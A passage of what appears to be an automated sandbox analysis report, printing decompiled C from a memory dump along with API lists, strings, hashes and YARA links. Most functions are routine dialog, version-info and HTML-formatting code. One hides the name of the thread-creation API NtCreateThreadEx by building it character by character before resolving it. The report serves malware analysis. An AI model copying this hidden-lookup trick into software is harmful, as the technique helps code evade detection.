                                                                                      • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                      • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 45%
                                                                                      			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                      0x00408ae3
                                                                                      0x00408aeb
                                                                                      0x00408af3
                                                                                      0x00408b76
                                                                                      0x00408b8a
                                                                                      0x00408b91
                                                                                      0x00408b98
                                                                                      0x00408bb1
                                                                                      0x00408bb3
                                                                                      0x00408bc6
                                                                                      0x00408bcc
                                                                                      0x00408bda
                                                                                      0x00408be0
                                                                                      0x00408bf3
                                                                                      0x00408bfa
                                                                                      0x00408c0b
                                                                                      0x00408c12
                                                                                      0x00408c17
                                                                                      0x00408c1a
                                                                                      0x00408c2c
                                                                                      0x00408c39
                                                                                      0x00408c3d
                                                                                      0x00408c3f
                                                                                      0x00408c41
                                                                                      0x00408c52
                                                                                      0x00408c58
                                                                                      0x00408c58
                                                                                      0x00408c6f
                                                                                      0x00408c71
                                                                                      0x00408c73
                                                                                      0x00408c83
                                                                                      0x00408c89
                                                                                      0x00408c89
                                                                                      0x00408c8a
                                                                                      0x00408c8f
                                                                                      0x00408c91
                                                                                      0x00408c9a
                                                                                      0x00408c93
                                                                                      0x00408c93
                                                                                      0x00408c93
                                                                                      0x00408c9f
                                                                                      0x00408ca5
                                                                                      0x00408caf
                                                                                      0x00408cbc
                                                                                      0x00408cc2
                                                                                      0x00408cc7
                                                                                      0x00408ccd
                                                                                      0x00408cd0
                                                                                      0x00408cd6
                                                                                      0x00408cd7
                                                                                      0x00408cd8
                                                                                      0x00408cde
                                                                                      0x00408ce3
                                                                                      0x00408ceb
                                                                                      0x00408cfe
                                                                                      0x00408d03
                                                                                      0x00408d06
                                                                                      0x00408d0c
                                                                                      0x00408d21
                                                                                      0x00408d27
                                                                                      0x00408d0c
                                                                                      0x00000000
                                                                                      0x00408ca7
                                                                                      0x00408ca7
                                                                                      0x00408cad
                                                                                      0x00408d28
                                                                                      0x00408d2e
                                                                                      0x00408d35
                                                                                      0x00408d36
                                                                                      0x00408d42
                                                                                      0x00408d48
                                                                                      0x00408d4e
                                                                                      0x00408d54
                                                                                      0x00408d5a
                                                                                      0x00408d60
                                                                                      0x00408d66
                                                                                      0x00408d6c
                                                                                      0x00408d72
                                                                                      0x00408d73
                                                                                      0x00408d7f
                                                                                      0x00408d85
                                                                                      0x00408d8a
                                                                                      0x00408d8f
                                                                                      0x00408d90
                                                                                      0x00408da8
                                                                                      0x00408db9
                                                                                      0x00408dbf
                                                                                      0x00408dc5
                                                                                      0x00408dc5
                                                                                      0x00000000
                                                                                      0x00408cad
                                                                                      0x00408ca5
                                                                                      0x00408af6
                                                                                      0x00408afc
                                                                                      0x00408b07
                                                                                      0x00408b2a
                                                                                      0x00408b38
                                                                                      0x00408b53
                                                                                      0x00408b56
                                                                                      0x00408b62
                                                                                      0x00408b6a
                                                                                      0x00408b6a
                                                                                      0x00408b2a
                                                                                      0x00408b07
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                      • {Unknown}, xrefs: 00408BA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                      • API String ID: 4111938811-1819279800
                                                                                      • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                      • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                      • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                      • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 82%
                                                                                      			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                      0x0040b04d
                                                                                      0x0040b05e
                                                                                      0x0040b060
                                                                                      0x0040b063
                                                                                      0x0040b06a
                                                                                      0x0040b06d
                                                                                      0x0040b076
                                                                                      0x0040b07b
                                                                                      0x0040b07e
                                                                                      0x0040b084
                                                                                      0x0040b08e
                                                                                      0x0040b0a8
                                                                                      0x0040b0aa
                                                                                      0x0040b0ad
                                                                                      0x0040b0b0
                                                                                      0x0040b0b3
                                                                                      0x0040b0b6
                                                                                      0x0040b0b8
                                                                                      0x0040b0bb
                                                                                      0x0040b0be
                                                                                      0x0040b0c1
                                                                                      0x0040b0c4
                                                                                      0x0040b0c7
                                                                                      0x0040b0ca
                                                                                      0x0040b0cd
                                                                                      0x0040b0cd
                                                                                      0x0040b0e5
                                                                                      0x0040b11f
                                                                                      0x0040b128
                                                                                      0x0040b0e7
                                                                                      0x0040b0e7
                                                                                      0x0040b0f1
                                                                                      0x0040b0f2
                                                                                      0x0040b0f3
                                                                                      0x0040b0fb
                                                                                      0x0040b0fd
                                                                                      0x0040b0fe
                                                                                      0x0040b11d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040b11d
                                                                                      0x0040b13c
                                                                                      0x0040b151
                                                                                      0x0040b166
                                                                                      0x0040b17b
                                                                                      0x0040b190
                                                                                      0x0040b1a5
                                                                                      0x0040b1ba
                                                                                      0x0040b1cf
                                                                                      0x0040b1d6
                                                                                      0x0040b1d7
                                                                                      0x0040b1d8
                                                                                      0x0040b1de
                                                                                      0x0040b1e3

                                                                                      APIs
                                                                                      • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                      • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                      • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                      • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                      • wcscpy.MSVCRT ref: 0040B128
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                      • API String ID: 1223191525-1542517562
                                                                                      • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                      • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                      • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                      • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 76%
                                                                                      			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                      0x0040a1f8
                                                                                      0x0040a26d
                                                                                      0x00000000
                                                                                      0x0040a26f
                                                                                      0x0040a205
                                                                                      0x0040a20b
                                                                                      0x0040a20d
                                                                                      0x0040a213
                                                                                      0x0040a214
                                                                                      0x0040a215
                                                                                      0x0040a216
                                                                                      0x0040a217
                                                                                      0x0040a219
                                                                                      0x0040a21f
                                                                                      0x0040a223
                                                                                      0x0040a227
                                                                                      0x0040a22b
                                                                                      0x0040a22f
                                                                                      0x0040a233
                                                                                      0x0040a237
                                                                                      0x0040a23b
                                                                                      0x0040a23f
                                                                                      0x0040a243
                                                                                      0x0040a247
                                                                                      0x0040a24b
                                                                                      0x0040a24f
                                                                                      0x0040a253
                                                                                      0x0040a257
                                                                                      0x0040a25b
                                                                                      0x0040a25f
                                                                                      0x0040a269
                                                                                      0x00000000
                                                                                      0x0040a26c
                                                                                      0x0040a271

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                      • API String ID: 2574300362-1257427173
                                                                                      • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                      • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                      • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                      • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 63%
                                                                                      			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                      0x00407f9b
                                                                                      0x00407fa3
                                                                                      0x00407fad
                                                                                      0x00407fb9
                                                                                      0x0040802e
                                                                                      0x00408032
                                                                                      0x00408038
                                                                                      0x0040803e
                                                                                      0x00407fbb
                                                                                      0x00407fc9
                                                                                      0x00407fd0
                                                                                      0x00407fe0
                                                                                      0x00407fe5
                                                                                      0x00407ff7
                                                                                      0x00408015
                                                                                      0x0040801b
                                                                                      0x00408021
                                                                                      0x00408021
                                                                                      0x00408051
                                                                                      0x00408051
                                                                                      0x00408059
                                                                                      0x00408065
                                                                                      0x00408069
                                                                                      0x0040806f
                                                                                      0x00408087
                                                                                      0x00408087
                                                                                      0x0040809c
                                                                                      0x004080bb
                                                                                      0x004080d1
                                                                                      0x004080de
                                                                                      0x004080e2
                                                                                      0x004080ea
                                                                                      0x004080fb
                                                                                      0x00408105
                                                                                      0x00408115
                                                                                      0x00408121
                                                                                      0x00408127
                                                                                      0x00408150

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407FD0
                                                                                      • memset.MSVCRT ref: 00407FE5
                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                      • LoadImageW.USER32 ref: 004080B4
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                      • LoadImageW.USER32 ref: 004080D1
                                                                                      • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                      • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                      • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                      • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                      • DeleteObject.GDI32(?), ref: 00408121
                                                                                      • DeleteObject.GDI32(?), ref: 00408127
                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                      • String ID:
                                                                                      • API String ID: 304928396-0
                                                                                      • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                      • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                      • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                      • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 69%
                                                                                      			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                      0x0040ae90
                                                                                      0x0040aeab
                                                                                      0x0040aeb2
                                                                                      0x0040aec0
                                                                                      0x0040aec7
                                                                                      0x0040aecc
                                                                                      0x0040aed3
                                                                                      0x0040aeda
                                                                                      0x0040aee1
                                                                                      0x0040aee1
                                                                                      0x0040aee7
                                                                                      0x0040aeea
                                                                                      0x0040aeed
                                                                                      0x0040aef9
                                                                                      0x0040aefe
                                                                                      0x0040af05
                                                                                      0x0040af07
                                                                                      0x0040af08
                                                                                      0x0040af13
                                                                                      0x0040af18
                                                                                      0x0040af19
                                                                                      0x0040af26
                                                                                      0x0040af2b
                                                                                      0x0040af2b
                                                                                      0x0040af2e
                                                                                      0x0040af34
                                                                                      0x0040af43
                                                                                      0x0040af44
                                                                                      0x0040af4f
                                                                                      0x0040af54
                                                                                      0x0040af55
                                                                                      0x0040af62
                                                                                      0x0040af67
                                                                                      0x0040af70
                                                                                      0x0040af76
                                                                                      0x0040af7a
                                                                                      0x0040af82
                                                                                      0x0040af88
                                                                                      0x0040af8d
                                                                                      0x0040af97
                                                                                      0x0040af9f
                                                                                      0x0040afa5
                                                                                      0x0040afa9
                                                                                      0x0040afb1
                                                                                      0x0040afb7
                                                                                      0x0040afbd

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                      • API String ID: 3143752011-1996832678
                                                                                      • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                      • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                      • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                      • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                      Uniqueness

